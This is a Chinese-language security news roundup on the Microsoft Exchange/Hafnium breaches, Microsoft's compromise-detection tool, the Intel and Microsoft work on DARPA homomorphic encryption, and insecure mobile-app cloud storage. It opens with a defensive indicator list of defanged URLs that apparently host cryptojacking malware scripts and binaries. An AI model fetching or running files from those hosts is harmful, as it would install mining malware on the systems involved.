hxxp://sh.epelcdn.com/dd09162/pm.sh hxxp://h.epelcdn.com/dd210131/pm.sh hxxp://176.123.7.127/id210131/phpupdate hxxp://h.epelcdn.com/dd210131/phpupdate hxxp://176.123.7.127/id210131/newdat.sh hxxp://h.epelcdn.com/dd210131/newdat.sh hxxp://176.123.7.127/id210131/config.json hxxp://h.epelcdn.com/dd210131/config.json hxxp://176.123.7.127/id210131/networkmanager hxxp://h.epelcdn.com/dd210131/networkmanager hxxp://176.123.7.127/id210131/phpguard hxxp://h.epelcdn.com/dd210131/phpguard   参考链接: https://www.freebuf.com/column/205114.html https://blogs.akamai.com/sitr/2021/02/bitcoins-blockchains-and-botnets.html https://unit42.paloaltonetworks.com/watchdog-cryptojacking/ https://s.tencent.com/research/report/1012.html    

微软 Exchange 漏洞事件升级

上周五,网络安全记者布莱恩·克雷布斯(Brian Krebs)和安迪·格林伯格(Andy Greenberg)报道称,在一次前所未有的电子邮件服务器攻击中有多达 3 万个组织受到影响。不过在上周末评估的最新数据,全球有超过 6 万个微软 Exchange 服务器客户被黑客攻击,欧洲银行业管理局承认是受害者之一。 Krebs 目前已经梳理了大规模 Exchange 服务器入侵事件的基本时间表,表示微软早在今年 1 月就已意识到这些漏洞。而首个安全补丁是在将近 2 个月之后才发布的,同时官方还发布了一篇博客文章,但没有解释攻击的范围和规模。甚至于微软原本计划将该补丁放在补丁星期二活动日上推出,但鉴于漏洞影响太大,所以才提前 1 周放出。 MIT Technology Review 报道称,除了主要黑客团体 Hafnium 之外,至少有 5 个黑客团体正在利用 Exchange 服务器的漏洞。目前美国政府官员正在争分夺秒的部署措施,一位官员告诉Cyberscoop,这是“A Big F-ing Deal”。 白宫新闻秘书 Jen Psaki 称这是“一个活跃的威胁”,让人们更加关注国土安全部网络安全机构3月3日发出的紧急指令。白宫国家安全顾问杰克-沙利文也对此提出了警告,前网络安全和基础设施安全局局长克里斯托弗-克雷布斯和白宫国家安全委员会也提出了警告。 Chris Krebs 在推文中写道:“这事情大条了。如果你的组织运行一个暴露在互联网上的OWA服务器,假设在02/26-03/03之间被入侵。检查C:\\inetpub\wwwroot\aspnet_client/system_web中的8个字符aspx文件。如果你搜索到了,你就进入了事件响应模式。” 国家安全委员会在推文中写道:“ 如果服务器已经被入侵,打补丁和缓解措施并不是补救措施。任何拥有易受攻击服务器的组织必须立即采取措施,以确定它们是否已经成为目标”。         (消息来源:cnBeta;封面源自网络)  

英特尔和微软共同助力美国 DARPA 加密项目

微软和英特尔已经签署了一项协议以帮助国防高级研究计划局(DARPA)开发一种完全同态加密(FHE)解决方案,该方案将消除数据必须解密才能处理等几个薄弱环节。通过FHE,可以对加密信息进行计算,这将消除解密数据的风险,但如今要实现它需要的计算能力非常大。 为了解决这个问题,DARPA启动了虚拟环境中的数据保护(DPRIVE)计划,英特尔和微软将参与该计划,致力于开发FHE计算的硬件加速器。 据英特尔公司介绍,DPRIVE计划将由几个阶段组成,包括设计、开发和验证将用于硬件的IP块和完整的软件栈。在核心开发工作之外,两家公司将与标准机构合作,围绕FHE制定标准。英特尔表示,也将继续投入资金进行FHE技术的学术研究。 在讨论项目面临的挑战时,DARPA项目经理Tom Rondeau说:”我们目前估计,我们在FHE世界中的计算速度要比在明文世界中的计算速度慢一百万倍。DPRIVE的目标是将FHE降低到我们在明文中看到的计算速度。如果我们能够实现这一目标,同时将技术定位为规模化,DPRIVE将对我们保护和维护数据和用户隐私的能力产生重大影响。” 微软方面表示,很高兴能将其在云计算和同态加密方面的专业知识带到这里。利用英特尔的硬件专长,微软希望能够帮助开发出一种适合商业用途的技术,以弥补 “数据保密性的最后一英里差距”。         (消息及封面来源:cnBeta)

微软邮件漏洞门 超2万个美国机构遭遇黑客攻击

本周五,一位知情人士表示,微软(Microsoft Corp.)电子邮件软件中的一个漏洞遭黑客攻击,超过2万个美国机构已被攻破。此次黑客攻击的范围已经超过了此前从太阳风公司(SolarWinds Corp)下载的所有受污染代码,该公司是去年12月曝光的另一场大规模黑客攻击的核心目标。   美国调查记录显示,最新的黑客攻击使得信用合作社、乡镇政府和小型企业均接入了远程接入渠道。 记录显示,来自亚洲和欧洲的数万个组织也受到了影响。 尽管微软本周二发布了紧急补丁,但黑客攻击仍在继续。 微软最初曾表示,此次黑客攻击是“有限的、有针对性的攻击”,周五却拒绝就问题的规模置评。不过微软公司也表示正与政府机构和安全公司合作,为客户提供帮助。 此外,微软公司补充说,“受到影响的客户应联系我们的支持团队,以获得额外的帮助和资源。” 对连接设备的一次扫描显示,截至本周五,只有10%的易受攻击的设备安装了补丁,不过这一数字还在上升。 由于安装补丁并不能彻底消除漏洞,美国官员正在努力研究如何通知所有受害者,并指导他们进行黑客追捕。 所有受影响的公司似乎都在自己的机器上运行了电子邮件客户端Outlook的Web版本,而不是依赖云提供商。记录显示,后者可能会使许多大公司和联邦政府机构幸免于难。 美国联邦网络安全与基础设施安全局(Federal Cybersecurity and Infrastructure Security Agency)没有回应置评请求。 本周五早些时候,白宫新闻秘书Jen Psaki对记者表示,目前在微软广泛使用的Exchange服务器上发现的漏洞是“重大的”,且“可能产生深远的影响”。 Psaki表示:“我们担心受害者的队伍过于庞大。” 微软和参与美国回应工作的人士将第一波黑客攻击归咎于一名有中国政府背景的演员。但一名中国政府发言人表示,中国不是此次黑客入侵事件的幕后黑手。 从去年年底开始的针对几个典型间谍目标的控制性攻击,已经在上个月发展成为了一场广泛的战役。安全官员表示,这意味着除非中国改变了策略,否则第二个组织可能已经参与其中。 随着用来控制邮件服务器代码的不断传播,预计未来还会有其他黑客发起更多的攻击。 政府工作人员表示,目前黑客们只是利用漏洞重新进入并在受感染的网络中移动,这只占很小比例,可能不到十分之一。 他说:“目前有几百人正在以最快的速度利用它们,窃取数据,并安装其他方法,以便稍后返回。” 最初的攻击途径是由中国台湾知名网络研究员Cheng-Da Tsai发现的。蔡表示,他在今年1月向微软报告了这一漏洞。他在一篇博客文章中说,他正在调查信息是否泄露。 他没有回应进一步置评的请求。           (消息来源:cnBeta;封面源自网络)

微软发布可排查 Exchange 服务器被入侵的工具

微软Exchange服务器的独立安装存在一系列缺陷,这导致了一场规模庞大的网络安全事件,有几十万台Exchange服务器的安装被黑客组织Hafnium入侵。Krebs on Security报道称,大量的小企业、城镇、城市和地方政府已经被感染,黑客在盗取了数据之余还留下了一个Web Shell,以便进一步指挥和控制。 为了快速帮助潜在受害者判断和解决问题,今天,微软发布了新的工具和指南,帮助服务器管理员检测和减轻威胁。 首先最重要的是,微软发布了免费的Exchange服务器 “入侵指标”工具的更新,该工具可用于扫描Exchange服务器的日志文件,以识别它们是否受到了入侵。 下载地址: https://github.com/microsoft/CSS-Exchange/tree/main/Security 微软还发布了紧急替代缓解指南,供无法应用微软已于3月2日发布的内置独立更新的管理员使用。然而应用补丁仍然是最有效的预防措施,如果你的服务器被感染,全面补救将是一项更大的工作。 “到目前为止,我们已经处理了几十个案例,早在2月28日[微软宣布其补丁之前],一直到现在,”发现攻击的Volexity总裁Steven Adair说。”即使你在微软公布补丁的同一天打了补丁,你的服务器上仍然很有可能存在一个web shell。事实是,如果你正在运行Exchange,而你还没有打补丁,那么你的网络组织很有可能已经被入侵。” “最好的保护是尽快在所有受影响的系统中应用更新,”微软发言人在一份书面声明中说。”我们将继续通过提供额外的调查和缓解指导来帮助客户。受影响的客户应该联系我们的支持团队,以获得额外的帮助和资源。”           (消息来源:cnBeta;封面源自网络)  

研究发现 14% 移动应用都将用户数据存储在不安全服务器上

应用开发者往往依赖第三方服务器来简化数据存储,但最新研究表明很多时候这些服务器对敏感数据并未提供完善的安全保护。来自亚马逊、谷歌和微软的第三方服务提供存储用户数据和系统文件的简单方式,开发者就不需要自己费力地对服务器进行编码。但开发者往往没有对这些服务器提供妥善的安全的保护,让用户数据处于开放状态,从而给黑客有乘之机。 根据市场调查机构 Zimperium 发布的最新研究表明,不管供应商是谁这种情况都时有发生。他们调查统计之后发现,14% 使用云存储的 iOS 和 Android 应用程序都有不安全的配置,非常容易受到攻击。 研究指出,这些服务器中可用的数据类型取决于相关应用,但所有存储的数据都可能被黑客使用。这些不安全的数据涵盖了从姓名和地址到每个用户的医疗和财务数据。 Zimperium表示,漏洞和数据被暴露后,可以用来获取更多敏感数据和操作流程。一些应用程序泄露了整个云基础设施脚本,包括SSH密钥和支付 kiosks 的密码。 Zimperium 对使用公共云服务的 8.4 万个 Android 应用和 4.7 万个 iOS 应用进行了调查之后得出以上结果的。在这些使用服务的应用中,有14%的应用暴露了用户数据。 Zimperium 的首席执行官 Shridhar Mittal 表示:“这是一个令人不安的趋势。很多这些应用的云存储都没有被开发者或负责人正确配置,正因为如此,数据对几乎任何人都是可见的。而我们大多数人现在都有一些这样的应用”。问题在于开发者没有保护好自己的服务器,所以任何和所有的应用类别都会受到影响。研究发现受影响最大的类别包括商业、购物、社交、通信和工具。       (消息及封面来源:cnBeta)